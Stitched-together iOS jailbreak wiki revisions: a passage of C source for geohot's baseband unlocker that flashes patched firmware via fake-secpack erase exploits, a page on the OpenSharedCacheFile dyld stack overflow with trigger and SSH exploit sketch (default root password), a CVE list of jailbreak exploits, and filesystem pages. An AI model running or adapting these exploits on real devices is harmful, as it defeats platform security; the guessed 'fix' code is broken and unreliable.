tcgetattr(fp,&options);
ioctl(fp,0x8004540A,&t1);
cfsetspeed(&options,115200);
cfmakeraw(&options);
options.c_cc[16]=0;
options.c_cc[17]=5;
options.c_iflag=(options.c_iflag | 0x5) & 0xFFFFF0CD;
options.c_oflag=options.c_oflag & 0xFFFFFFFE;
options.c_cflag=(options.c_cflag | 0x3CB00) & 0xFFFFEFFF;
options.c_lflag=options.c_lflag & 0xFFFFFA77;
tcsetattr(fp,0,&options);
ioctl(fp,0x20007479);
ioctl(fp,0x20007478);
ioctl(fp,0x8004746D,&t2);
printf("Opened: /dev/tty.baseband\n");
}
void printbuffer()
{
for(t=0;t<hlen;t++)
{
if(t!=0&&t%16==0) printf("\n");
printf("%2.2X ", data[t]);
}
if(hlen>0)
printf("\n");
}
struct cmd_pkt{
unsigned short int w02;
unsigned short int cmd;
unsigned short int data_size;
};
struct cmd_pkt_end{
unsigned short int checksum;
unsigned short int w03;
};
struct cmd_pkt mycmdpkt;
struct cmd_pkt_end mycmdpktend;
void cmd_write()
{
mycmdpkt.w02=2;
mycmdpktend.w03=3;
mycmdpktend.checksum=0;
for(t=0;t<mycmdpkt.data_size;t++)
{
mycmdpktend.checksum+=data[t];
}
mycmdpktend.checksum+=mycmdpkt.cmd+mycmdpkt.data_size;
write(fp,&mycmdpkt,6);
write(fp,data,mycmdpkt.data_size);
write(fp,&mycmdpktend,4);
}
void usage()
{
printf("geohot's 112 otb unlocker...\n");
}
int enterinteractive()
{
tcgetattr(fp,&options); //baud rate upped
cfsetspeed(&options,115200);
tcsetattr(fp,0,&options);
printf("Waiting for data...\n");
do
{
data[0]=0x60; data[1]=0x0D;
if(write(fp,data,2)==-1)
{
printf("Can't write\n");
return -1;
}
printf("Attempt...\n");
getheader(500);
} while(hlen==0||data[0]!=0xb);
printf("Got Header: %d %2.2x %2.2x\n",hlen, data[0], data[1]);
return 0;
}
void increasebaudrate()
{
printf("Increasing baud rate...\n");
mycmdpkt.cmd=0x82;
mycmdpkt.data_size=4;
data[0]=0x00; data[1]=0x10; data[2]=0x0E; data[3]=0x00; //115200 bps
cmd_write();
getcommand();
printbuffer();
tcgetattr(fp,&options); //baud rate upped
cfsetspeed(&options,921600);
tcsetattr(fp,0,&options);
}
void getflashid()
{
printf("Get flash ID\n");
mycmdpkt.cmd=0x801;
mycmdpkt.data_size=0;
cmd_write();
getcommand();
//printbuffer();
}
void cfistage1()
{
printf("CFI Stage 1\n");
mycmdpkt.cmd=0x84;
mycmdpkt.data_size=2;
data[0]=0; data[1]=0;
cmd_write();
getcommand();
//printbuffer();
}
void cfistage2()
{
printf("CFI Stage 2\n");
mycmdpkt.cmd=0x85;
mycmdpkt.data_size=0;
cmd_write();
getcommand();
//printbuffer();
}
void address(unsigned int addr, int print)
{
adrcount=addr;
if(print==0) printf("Address to 0x%X ",addr);
mycmdpkt.cmd=0x802;
mycmdpkt.data_size=4;
memcpy(data,&addr,4);
cmd_write();
getcommand();
if(print==0) printbuffer();
}
void sendsecpack(char *secpack)
{
printf("Sending secpack... ");
mycmdpkt.cmd=0x204;
mycmdpkt.data_size=0x800;
memcpy(data,secpack,0x800);
cmd_write();
getcommand();
printbuffer();
}
void bbread(short int len)
{
mycmdpkt.cmd=0x803;
mycmdpkt.data_size=2;
memcpy(data,&len,2);
cmd_write();
getcommand();
printbuffer();
}
void bbwrite(unsigned int size, int print) //put crap in data already
{
if(print==0) printf("Writing: 0x%X ",adrcount);
mycmdpkt.cmd=0x804;
mycmdpkt.data_size=size;
cmd_write();
getcommand();
if(print==0) printbuffer();
adrcount+=size;
}
int erase(unsigned int start, unsigned int end, int debug)
{
printf("Erasing: 0x%X-0x%X ",start, end);
mycmdpkt.cmd=0x805;
mycmdpkt.data_size=8;
memcpy(data,&start,0x4);
memcpy(&data[4],&end,0x4);
cmd_write();
getcommand();
printbuffer();
printf("Waiting for erase to finish...\n");
do{
mycmdpkt.cmd=0x806;
mycmdpkt.data_size=2;
data[0]=0; data[1]=0;
cmd_write();
getcommand();
if(debug==0) printbuffer();
usleep(100000);
}while(data[6]==0);
if(debug!=0) printbuffer();
if(data[9]!=0x31)
{
//printf("Erase failed!\n");
return -1;
}
return 0;
}
void endsecpack()
{
printf("End Secpack ");
mycmdpkt.cmd=0x205;
mycmdpkt.data_size=2;
data[0]=0; data[1]=0;
cmd_write();
getcommand();
printbuffer();
}
void readmem(unsigned int addr) //you need a patched bootloader :)
{
//printf("procx102\n");
unsigned int memdata;
mycmdpkt.cmd=0x102;
mycmdpkt.data_size=4;
memcpy(data,&addr,0x4);
cmd_write();
getcommand();
memcpy(&memdata,&data[6],0x4);
printf("[0x%X]=0x%X\n",addr,memdata);
//printbuffer();
}
#define patchloc 0x2359d4 //this is for 4.02.13
int main(int argc, char *argv[])
{
usage();
if(argc<3) { printf("usage: %s <113secpack> <112fls>\n",argv[0]); return -1;}
resetbaseband();
fp = openport(115200);
//FILE *secpack=fopen(argv[1],"rb");
data=(unsigned char *)malloc(70000);
if(enterinteractive()==-1) return -1;
printf("Bootloader version: %s\n",&data[0xD]);
if(data[5]!=4)
{
printf("Incorrect bootloader version\n");
return -1;
}
increasebaudrate();
cfistage1();
cfistage2();
char *rsecpack=(char *)malloc(0x800);
FILE *secpack=fopen(argv[1],"rb");
fread(rsecpack,1,0x800,secpack);
fclose(secpack);
//Send the 1.1.3 secpack to erase 1.1.2
sendsecpack(rsecpack);
if(erase(0xA0020000, 0xA03BFFFE,1)==-1) {
printf("Erase failed\n");
printf("Hang on...we can fix that\n");
const char efakesec[]={0x00,0x00,0x02,0xA0,0x00,0x00,0x3D,0x00,0x00,0x00,0x3D,0x00,0x00,0x00,0x00,0x00}; //full range including main fw...
//2nd exploit variant for >=1.1.3
memcpy(&rsecpack[0x780],efakesec,0x10);
sendsecpack(rsecpack);
endsecpack();
erase(0xA03D0000,0xA03F0000,1); //the only secpack free allowed erase :)
printf("Okay, lets try that again...\n");
secpack=fopen(argv[1],"rb"); //reread
fread(rsecpack,1,0x800,secpack);
fclose(secpack);
sendsecpack(rsecpack);
if(erase(0xA0020000, 0xA03BFFFE,1)==-1) {
printf("Hmm...what did you do?");
return -1;
}
}
//First exploit, the -0x20000 exploit
//This writes the firmware, in all its unsigned glory
//I guess Apple figured -0x400 was simple, -0x20000 is *much* harder
address(0xA0000000,0); //-0x20000, like i said :)
FILE *bb=fopen(argv[2],"rb");
fseek(bb,0x9a4,SEEK_SET); //skip bbupdater data and secpack
int a,rc=0;
do{
a=fread(data,1,0x800,bb);
if(rc<patchloc&&patchloc<(rc+a)) //patch the firmware
{
printf("Patching...\n");
data[patchloc-rc+3] = 0xe3;
data[patchloc-rc+2] = 0xa0;
data[patchloc-rc+1] = 0x00;
data[patchloc-rc] = 0x01;
}
if(rc%0x10000==0||a!=0x800) printf("Wrote: 0x%x 0x%x\n",a,rc);
if(a>0)
bbwrite(a,1); //write like hell
rc+=a;
}while(a>0);
//Second exploit, the fake secpack erase range
//If a valid secpack is present in 0x3C0000, the phone won't boot
//And since endpack doesn't work, I needed to find another way
const char fakesec[]={0x00,0x00,0x3C,0xA0,0x00,0x00,0x03,0x00,0x00,0x00,0x03,0x00,0x00,0x00,0x00,0x00}; //not 0xA03D0000
memcpy(&rsecpack[0x780],fakesec,0x10);
sendsecpack(rsecpack);
endsecpack();
erase(0xA03D0000,0xA03F0000,1); //the only secpack free allowed erase :)
close(fp);
resetbaseband();
printf("Enjoy your unlocked iPhone...\n");
return 0;
}

OpenSharedCacheFile

2021-03-05T04:51:49Z

Inflatable Man: /* Apple's fix */ Add a space

The OpenSharedCacheFile bug was found by [[i0n1c]]. This bug is a simple stack overflow.
== Opensharedcachefile() function ==
int openSharedCacheFile()
{
char path[1024];
strcpy(path, sSharedCacheDir);
strcat(path, "/");
strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME);
return ::open(path, O_RDONLY);
}

== Triggering the vuln ==

To trigger it, run the following
DYLD_SHARED_CACHE_DIR = "A" * 2000 \
DYLD_SHARED_REGION = private /bin/launchctl
This will overflow the PC register making it a stack overflow.

== Exploiting it ==

Since this bug can takeover the PC register, you first need to know where the bug starts
for now lets say it crashes after 1024 A's, so your payload to get root would be
junk = "A" * 1024
shellcode = ""
payload = "DYLD_SHARED_CACHE_DIR"
actual = payload+junk+shellcode \
cmd = "DYLD_SHARED_REGION = "private /bin/launchctl"
ssh = paramiko.SSHClient()
server = "" #whatever IP
ssh.connect(server, username="root", password="alpine")
ssh.exec_command(actual)
ssh.exec_command(cmd)

== Apple's fix ==

I'm guessing they added an if-statement to check for the size sSharedCacheDir
so like this.

extern void _ZN4dyld4haltEPKc(const char* msg) __attribute__((noreturn));
void __stack_chk_fail()
{
_ZN4dyld4haltEPKc("stack buffer overrun");
}

if(sizeof(sSharedCacheDir >= 1024){
__stack_chk_fail();
}

/Applications/PreBoard.app

2021-03-04T20:29:32Z

Inflatable Man: Updated what happens when PreBoard is opened.

The complete purpose of PreBoard is currently unknown.

This application runs right after boot (before the first device unlock) and thus data at rest protection is in place. Once the PIN is entered, the encrypted user storage becomes accessible, and the key is handed to the SEP for use when the device is unlocked via TouchID or FaceID. Because between iOS releases Apple changes data formats, this allows for user data to be migrated. It is also the UI that is shown when a device is restored via iTunes.

It is known that this app runs once upon restoring and/or updating. PreBoard is what shows the "slide to upgrade" text on a screen that looks similar to the Enter Passcode screen.

It also tracks if the user has activated their device or not. If the device is activated PreBoard will not show up.

If you launch PreBoard off of [[/System/Library/CoreServices/SpringBoard.app|SpringBoard]], it will not launch and the app will crash on iOS < 13. On iOS ≥ 13, it will either freeze the device if the device does not have a passcode, Touch ID, or Face ID enabled, or a white screen will be shown until the device authenticates with either Touch ID or Face ID.

PreBoard.app works with [[/System/Library/CoreServices/SpringBoard.app|SpringBoard]] and [[backboardd]].

== Parents ==
{{parent|Applications}}

[[Category:Software]]
[[Category:Filesystem]]
[[Category:Application]]

Jailbreak Exploits

2021-03-02T15:06:16Z

Inflatable Man: /* checkra1n (14.0 - 14.2~b) */

This page lists the '''exploits''' used in [[jailbreak]]s.

== Common exploits ==
These exploits are not dependent on any firmware; as such, they are used in numerous jailbreaking programs.

* [[Pwnage]] + [[Pwnage 2.0]] (together to jailbreak the [[M68AP|iPhone]], [[N45AP|iPod touch]], and [[N82AP|iPhone 3G]])
* [[ARM7 Go]] (from iOS 2.1.1) (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])
* [[0x24000 Segment Overflow]] (for [[untethered jailbreak]] on [[N88AP|iPhone 3GS]] with [[Bootrom 359.3|old bootrom]] and [[N72AP|iPod touch (2nd generation)]] with [[Bootrom 240.4|old bootrom]]; another exploit as the [[limera1n Exploit]] is required)
* [[limera1n Exploit]] (for [[tethered jailbreak]] on [[N88AP|iPhone 3GS]], [[N18AP|iPod touch (3rd generation)]], [[K48AP|iPad]], [[iPhone 4]], [[N81AP|iPod touch (4th generation)]] and [[K66AP|Apple TV (2nd generation)]])
* [[usb_control_msg(0xA1, 1) Exploit]] (also known as "steaks4uce") (for [[tethered jailbreak]] on [[N72AP|iPod touch (2nd generation)]])

== Jailbreak Programs ==
=== [[PwnageTool]] (2.0 - 5.1.1) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[redsn0w]] (3.0 - 6.0) ===
* uses different common exploits
* uses the same exploits as [[Absinthe|Absinthe]] and [[Absinthe|Absinthe 2.0]] to jailbreak iOS 5.0/5.0.1 and 5.1.1
* uses the exploits listed below to untether up to iOS 5.1.1

=== [[sn0wbreeze]] (3.1.3 - 6.1.3) ===
* uses different common exploits
* uses the exploits listed below to untether up to iOS 6.1.2

== Programs used to jailbreak 1.x ==
=== [[AppTapp Installer]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[iBrickr]] (1.0 / 1.0.1 / 1.0.2) ===
* iBoot <code>cp</code>-command exploit

=== [[AppSnapp]]/[[JailbreakMe|JailbreakMe 1.0]] (1.0 / 1.0.1 / 1.0.2 / 1.1.1) ===
* [[LibTiff|libtiff exploit]] (Adapted from the PSP scene, used by [[JailbreakMe]]) ({{cve|2006-3459}})

=== [[mknod|OktoPrep]] (1.1.2) ===
"Upgrade" to 1.1.2 from a jailbroken 1.1.1
* [[mknod]]

=== [[Soft Upgrade]] (1.1.3) ===
"Upgrade" to 1.1.3 from a running jailbroken 1.1.2

=== [[ZiPhone]] (1.1.3 / 1.1.4 / 1.1.5) ===
* [[Ramdisk Hack]]

=== [[iLiberty+|iLiberty / iLiberty+]] (1.1.3 / 1.1.4 / 1.1.5) ===

== Programs used to jailbreak 2.x ==
=== [[QuickPwn]] (2.0 - 2.2.1) ===
* uses [[Pwnage]] and [[Pwnage 2.0]]

=== [[Redsn0w Lite]] (2.1.1) ===
* [[ARM7 Go]] (for [[N72AP|iPod touch (2nd generation)]] only)

== Programs used to jailbreak 3.x ==
=== [[purplera1n]] (3.0) ===
* [[iBoot Environment Variable Overflow]] ({{cve|2009-2795}})
* uses [[0x24000 Segment Overflow]]

=== [[blackra1n]] (3.1 / 3.1.1 / 3.1.2) ===
* [[usb_control_msg(0x21, 2) Exploit]] ({{cve|2010-0038}})
* uses [[0x24000 Segment Overflow]]

=== [[Spirit]] (3.1.2 / 3.1.3 / 3.2) ===
* [[MobileBackup Copy Exploit]]
* [[Incomplete Codesign Exploit]]
* [[BPF_STX Kernel Write Exploit]]

=== [[Star|JailbreakMe 2.0 / Star]] (3.1.2 / 3.1.3 / 3.2 / 3.2.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] / [[greenpois0n (jailbreak)|greenpois0n]] (3.2.2) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

== Programs used to jailbreak 4.x ==
=== [[Star|JailbreakMe 2.0 / Star]] (4.0 / 4.0.1) ===
* [[Malformed CFF Vulnerability]] ({{cve|2010-1797}})
* [[Incomplete Codesign Exploit]]
* [[IOSurface Kernel Exploit]] ({{cve|2010-2973}})

=== [[limera1n]] (4.0 / 4.0.1 / 4.0.2 / 4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.1) ===
* uses different common exploits
* [[Packet Filter Kernel Exploit]]

=== [[greenpois0n (jailbreak)|greenpois0n]] (4.2.1) ===
* uses different common exploits
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.2.6 / 4.2.7 / 4.2.8) ===
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[HFS Legacy Volume Name Stack Buffer Overflow]]

=== [[unthredeh4il]] (4.2.6 - 4.2.10) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

=== [[Saffron|JailbreakMe 3.0 / Saffron]] (4.3 / 4.3.1 / 4.3.2 / 4.3.3) ===
Except for the [[N18AP|iPod touch (3rd generation)]] on iOS 4.3.1.
* [[T1 Font Integer Overflow]] ({{cve|2011-0226}})
* [[IOMobileFrameBuffer Privilege Escalation Exploit]] ({{cve|2011-0227}})

=== i0nic's Untether (4.3.1 / 4.3.2 / 4.3.3) ===
used in [[redsn0w]] to untether iOS 4.3.1 / 4.3.2 / 4.3.3
* [[ndrv_setspec() Integer Overflow]]

=== [[unthredeh4il]] (4.3 - 4.3.5) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 5.x ==

=== [[Absinthe]] (5.0 on [[N94AP|iPhone 4S]] only / 5.0.1 on [[iPad 2]] and [[iPhone 4S]]) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}}) (used both for payload injection and untether)
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Corona|Corona Untether]] (5.0.1) ===
* [[Racoon String Format Overflow Exploit]] ({{cve|2012-0646}})
* [[HFS Heap Overflow]] ({{cve|2012-0642}})
* unknown exploit ({{cve|2012-0643}})

=== [[Absinthe|Absinthe 2.0]] and [[Rocky Racoon|Rocky Racoon Untether]] (5.1.1) ===
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* Racoon DNS4/WINS4 table buffer overflow ({{cve|2012-3727}})
* MobileBackup2 Copy Exploit

=== [[unthredeh4il]] (5.0-5.1.1) ===
Except for the [[iPad (3rd generation)]]
* MobileBackup2 Copy Exploit
* a new Packet Filter Kernel Exploit ({{cve|2012-3728}})
* [[AMFID code signing evasion]] ({{cve|2013-0977}})
* [[launchd.conf untether]]
* [[Timezone Vulnerability]]

== Programs used to jailbreak 6.x ==
=== [[evasi0n]] (6.0 / 6.0.1 / 6.0.2 / 6.1 / 6.1.1 / 6.1.2) ===
* [[Symbolic Link Vulnerability]] ({{cve|2013-0979}})
* [[Timezone Vulnerability]]
* [[Shebang Trick]] ({{cve|2013-5154}})
* [[AMFID code signing evasion]]
* [[launchd.conf untether]]
* [[IOUSBDeviceFamily Vulnerability]] ({{cve|2013-0981}})
* [[ARM Exception Vector Info Leak]] ({{cve|2013-0978}})
* [[dynamic memmove() locating]]
* [[vm_map_copy_t corruption for arbitrary memory disclosure]]
* [[kernel memory write via ROP gadget]]
* [[Overlapping Segment Attack]] ({{cve|2013-0977}})

=== [[p0sixspwn]] (6.1.3 / 6.1.4 / 6.1.5 / 6.1.6) ===
* [[posix_spawn kernel information leak]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[posix_spawn kernel exploit]] ({{cve|2013-3954}}) (by [[i0n1c]])
* [[mach_msg_ool_descriptor_ts for heap shaping]] ({{cve|2013-3953}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* [[DeveloperDiskImage race condition]] (by [[comex]])
* [[launchd.conf untether]]

== Programs used to jailbreak 7.x ==
=== [[evasi0n7]] (7.0 / 7.0.1 / 7.0.2 / 7.0.3 / 7.0.4 / 7.0.5 / 7.0.6) ===
{{Section Stub}}
* [[Symbolic Link Vulnerability]] ({{cve|2013-5133}})
* [[AMFID_code_signing_evasi0n7]] ({{cve|2014-1273}})
* CrashHouseKeeping chmod vulnerability ({{cve|2014-1272}})
* ptmx_get_ioctl ioctl crafted call ({{cve|2014-1278}})

=== [[Geeksn0w]] (7.1 / 7.1.1) ===
* [[limera1n]]'s bootrom exploit ([[Tethered jailbreak]]) on [[iPhone 4]]

=== [[Pangu]] (7.1 / 7.1.1 / 7.1.2) ===
* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) (Pangu v1.0.0)
* AppleKeyStore::initUserClient info leak ({{cve|2014-4407}}) (Pangu >v1.0.0)
* break_early_random (by [[i0n1c]] and Tarjei Mandt of Azimuth) ({{cve|2014-4422}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOSharedDataQueue notification port overwrite ({{cve|2014-4461}})
* "syslogd chown" vulnerability
* enterprise certificate (no real exploit, used for initial "unsigned" code execution)
* "foo_extracted" symlink vulnerability (used to write to /var) ({{cve|2014-4386}})
* /tmp/bigfile (a big file for improvement of the reliability of a race condition)
* VoIP backgrounding trick (used to auto restart the app)
* hidden segment attack

== Programs used to jailbreak 8.x ==
=== [[Pangu8]] (8.0 / 8.0.1 / 8.0.2 / 8.1) ===
* an exploit for a bug in /usr/libexec/neagent (source @iH8sn0w)
* enterprise certificate (inside the IPA)
* a kind of dylib injection into a system process (see IPA)
* a dmg mount command (looks like the Developer DMG) (syslog while jailbreaking)
* a sandboxing problem in debugserver ({{cve|2014-4457}})
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* the same kernel exploit as used in [[Pangu|the first Pangu]] ({{cve|2014-4461}}) (source @iH8sn0w) - now used to also leak kernel memory (source @Morpheus______)
* enable-dylibs-to-override-cache
* a new ovelapping segment attack ({{cve|2014-4455}})

=== [[TaiG]] and [[PPJailbreak]] (8.0 / 8.0.1 / 8.0.2 / 8.1 / 8.1.1 / 8.1.2) ===
(See also details at [http://newosxbook.com/articles/TaiG.html newosxbook.com])
* A new AFC symlink attack ({{cve|2014-4480}}) - to get onto the device filesystem
* [[DeveloperDiskImage race condition]] (by [[comex]], also used in p0sixspwn) - to mount a fake DDI and instantly overwrite (via union) libmis/xpcd_cache
* A new overlapping segment attack [in a modified version], dyld, ({{cve|2014-4455}}) - negative LC_SEGMENT - to allow libmis and xpcdcache to load
* libmis redirection of MISValidateSignature (as per evasion) to kCFEqual, with overlapping segment variant on TaiG (Segment at end of file, negative)
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis/xpcd_cache)
* MobileStorageMounter exploit ({{cve|2015-1062}})
* Backup exploit used to access restricted parts of the filesystem ({{cve|2015-1087}})

Kernel:

* Mach-O OSBundleHeaders info leak ({{cve|2014-4491}}) - leaks slid addresses
* mach_port_kobject exploit {{cve|2014-4496}} - used to recover the permutation value and addresses of kernel objects
* IOHIDFamily Kernel exploit ({{cve|2014-4487}}) - to overwrite memory

=== [[TaiG]] and [[PPJailbreak]] (8.1.3 / 8.2 / 8.3 / 8.4) ===
(See also details at http://newosxbook.com/articles/28DaysLater.html and http://newosxbook.com/articles/HIDeAndSeek.html)
* [[DeveloperDiskImage race condition]] (also used in TaiG for 8.0-8.1.2 but modified) - to mount a fake DDI
* enable-dylibs-to-override-cache - force loading of dynamic libraries from filesystem (where available) instead of the shared cache (overriding libmis)
* Symbolic linking to AFC ({{cve|2015-5746}})
* Backup exploit to write to protected regions of the disk ({{cve|2015-5752}})
* Code signing exploit ({{cve|2015-3802}})
* Code signing exploit ({{cve|2015-3803}})
* Code signing exploit ({{cve|2015-3805}})
* Code signing exploit ({{cve|2015-3806}})
* IOHIDFamily exploit ({{cve|2015-5774}})
* Air Traffic exploit to allow attackers to access arbitrary filesystem locations via vectors related to asset handling ({{cve|2015-5766}})

=== [[EtasonJB]] and [[Home Depot]] (8.4.1) ===

* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

== Programs used to jailbreak 9.x ==
=== [[Pangu9]] (9.0 / 9.0.1 / 9.0.2 / 9.1) ===
* Photos exploit to gain arbitrary unsandboxed file system access as mobile to load outdated DDI. ({{cve|2015-7037}})
* MobileStorageMounter allowed older DeveloperDiskImages to be mounted, resulting in unsandboxed unsigned code execution due to known weaknesses in entitled executables. ({{cve|2015-7051}})
* IOHIDFamily Use-After-Free for kernel information leak / code execution as mobile. ({{cve|2015-6974}})
* dyld exploit in dyld shared cache handling to override MISValidateSignature in libmis.dylib for persistency ({{cve|2015-7079}})
* Racing KPP for some of the patches.
* AMFI MAC Hooks were in non-__const __DATA section, so wouldn't be integrity checked by KPP, allowing to replace MAC hooks required for code-signing. ({{cve|2015-7055}})

=== [[Pangu9]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* IOMobileFrameBuffer exploit to execute arbitrary code with kernel privileges. ({{cve|2016-4654}})

=== [[jbme]] (9.2 / 9.2.1 / 9.3 / 9.3.1 / 9.3.2 / 9.3.3) ===
* Webkit exploit ({{cve|2016-4657}})

=== [[Home Depot]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})

=== [[JailbreakMe 4.0]] (9.1-9.3.4) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* Kernel exploit ({{cve|2016-4656}})
* Webkit exploit ({{cve|2016-4657}})

=== [[Phœnix]] (9.3.5 / 9.3.6) ===
* OSUnserialize Information leak ({{cve|2016-4655}})
* mach_port_register Kernel exploit ({{cve|2016-4669}})

== Programs used to jailbreak 10.x ==

=== [[extra_recipe+yaluX]] (10.0-10.1.1) ===

* set_dp_control_port exploit to execute arbitrary code with kernel privileges. ({{cve|2016-7644}})

=== [[yalu102]] (10.0.1-10.2) ===

* mach_voucher_extract_attr_recipe_trap memory corruption. ({{cve|2017-2370}})

=== [[doubleH3lix]] (10.0.1 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[Meridian]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

=== [[TotallyNotSpyware]] (10.0 - 10.3.3) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})
* WebKit JIT optimization bug exploit ({{cve|2018-4233}})

=== [[H3lix]] (10.0.1 - 10.3.4) ===

* IOSurface Kernel Exploit ({{cve|2017-13861}})

== Programs used to jailbreak 11.x ==

===[[Unc0ver]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.0 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.0 - 11.4.1

* voucher_swap ({{cve|2019-6225}})

===[[Electra]] (11.0-11.4.1)===

11.0 - 11.1.2

* IOSurface Kernel Exploit ({{cve|2017-13861}})

11.2 - 11.3.1

* mptcp_usr_connectx (multi_path) ({{cve|2018-4241}})
* getvolattrlist (empty_list) ({{cve|2018-4243}})

11.2 - 11.4.1

* v1ntex ({{cve|2019-6225}})

== Programs used to jailbreak 12.x ==

===[[Chimera]] (12.0 - 12.2 / 12.4)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

===[[Unc0ver]] (12.0 - 12.2 / 12.4 / 12.4.1 / 12.4.2 - 12.4.8)===

12.0 - 12.1.2

* voucher_swap ({{cve|2019-6225}})

12.0 - 12.2/12.4

* SockPuppet ({{cve|2019-8605}})

12.4.1

* AppleAVE2Driver exploit ({{cve|2019-8795}})
* AppleSPUProfileDriver information leak ({{cve|2019-8794}})

12.4.2 - 12.4.8

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

===[[checkra1n]] (12.3 - 12.4.8)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 13.x ==

===[[Unc0ver]] (13.0 - 13.5.5~b1 (excluding 13.5.1))===

13.0 - 13.3 (before version 5.0.0)

* oob_timestamp ({{cve|2020-3837}})
* cuck00 information leak ({{cve|2020-3836}})

13.0 - 13.5.5~b1 (excluding 13.5.1) (since version 5.0.0)

* tachy0n (LightSpeed) ({{cve|2020-9859}})

===[[Odyssey]] (13.0 - 13.7)===

13.0 - 13.5

* tardy0n (LightSpeed) ({{cve|2020-9859}})

13.5.1 - 13.7 (for devices with SoCs other than the A8 and A9)

* FreeTheSandbox_LPE_POC_13.7

13.5.1 - 13.7 (for devices with A8/A9 SoCs)

* oob_events ({{cve|2020-27905}}), ({{cve|2020-9964}})

===[[checkra1n]] (13.0 - 13.7)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

== Programs used to jailbreak 14.x ==

===[[checkra1n]] (14.0 - 14.4)===

* [[Checkm8_Exploit | checkm8]] ({{cve|2019-8900}})

===[[unc0ver]] (14.0 - 14.3)===

* (untitled exploit) ({{cve|2021-1782}})

/

2021-02-28T20:22:27Z

Inflatable Man: /* Folders */

__NOTOC__
This is the root directory for [[iOS]]. The firmware listing of these folders follow very closely to the [[wikipedia:Filesystem Hierarchy Standard|Filesystem Hierarchy Standard]] for [[wikipedia:Unix|Unix]] and [[wikipedia:Unix-like|Unix-like]] [[wikipedia:Operating system|operating systems]].

== Children ==
=== Folders ===
* {{ipfw|.ba}}
* {{ipfw|.HFS+ Private Directory Data}} (not present in the newer iOS versions)
* {{ipfw|.mb}}
* {{ipfw|AppleInternal}} ([[Apple Internal Apps|Apple Internal apps]] and [[Prototype Firmware|prototypes]]; only present in some internal iOS versions)
* {{ipfw|Applications}}
* {{ipfw|bin}}
* {{ipfw|boot}} (not present in the newer iOS versions)
* {{ipfw|cores}}
* {{ipfw|dev}}
* {{ipfw|Developer}}
* {{ipfw|private/etc|etc}} ([[wikipedia:Symbolic link|symlink]] to <code>/private/etc</code>)
* {{ipfw|Library}}
* {{ipfw|lib}} (not present in jailed iOS)
* {{ipfw|mnt}}
* {{ipfw|private}}
* {{ipfw|sbin}}
* {{ipfw|System}}
* {{ipfw|private/var/tmp|tmp}} (symlink to <code>/private/var/tmp</code>)
* {{ipfw|private/var/mobile|User}} (symlink to <code>/private/var/mobile</code> ({{ipfw|private/var/root|/private/var/root}} on [[iOS|iPhone OS]] 1.1.2 and below)
* {{ipfw|usr}}
* {{ipfw|private/var|var}} (symlink to <code>/private/var</code>)

=== Files ===
* {{ipfw|.file}}
* {{ipfw|.Trashes}}

== External Links ==
* [http://refspecs.linuxfoundation.org/FHS_2.3/fhs-2.3.html Filesystem Hierachy Standard 2.3]
* [https://developer.apple.com/library/mac/documentation/FileManagement/Conceptual/FileSystemProgrammingGuide/FileSystemOverview/FileSystemOverview.html File System Basics (Apple)]
[[Category:Filesystem]]

/

2021-02-28T20:22:09Z

Inflatable Man: /* Folders */

__NOTOC__
This is the root directory for [[iOS]]. The firmware listing of these folders follow very closely to the [[wikipedia:Filesystem Hierarchy Standard|Filesystem Hierarchy Standard]] for [[wikipedia:Unix|Unix]] and [[wikipedia:Unix-like|Unix-like]] [[wikipedia:Operating system|operating systems]].

== Children ==
